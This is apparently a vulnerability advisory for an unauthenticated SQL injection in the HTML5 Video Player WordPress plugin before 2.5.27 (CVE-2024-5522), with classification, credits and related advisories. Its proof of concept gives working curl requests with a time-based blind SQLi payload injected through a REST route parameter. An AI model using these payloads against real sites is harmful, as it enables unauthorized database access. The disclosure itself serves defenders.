WordPress Plugin Vulnerabilities

HTML5 Video Player < 2.5.27 - Unauthenticated SQLi

Description

The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

Proof of Concept

% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-"

{"code":"not_found","message":"Data not found","data":{"status":404}}curl   0.01s user 0.02s system 0% cpu 5.760 total

% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)--+-"

{"code":"not_found","message":"Data not found","data":{"status":404}}curl   0.01s user 0.01s system 1% cpu 1.204 total

Affects Plugins

Plugin icon
html5-video-player
Fixed in 2.5.27

References

CVE
CVE-2024-5522

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher
Mayank Deshmukh
Submitter
Mayank Deshmukh
Submitter website
https://coldfusionx.github.io/
Submitter twitter
ColdFusionX_
Verified
Yes
WPVDB ID
bc76ef95-a2a9-4185-8ed9-1059097a506a

Timeline

Publicly Published
2024-05-30 (about 30 days ago)
Added
2024-05-30 (about 30 days ago)
Last Updated
2024-05-30 (about 30 days ago)

Other

Published
Title
Published
2022-03-07
Title
Wow Countdowns <= 3.1.2 - Admin+ SQLi
Published
2024-04-11
Title
Advanced Page Visit Counter <= 8.0.6 - Authenticated (Administrator+) SQL Injection
Published
2014-08-01
Title
Download - (dl_id) SQL Injection
Published
2024-03-29
Title
10Web Map Builder for Google Maps <= 1.0.74 - Authenticated (Administrator+) SQL Injection
Published
2016-11-17
Title
Answer My Question 1.3 - SQL Injection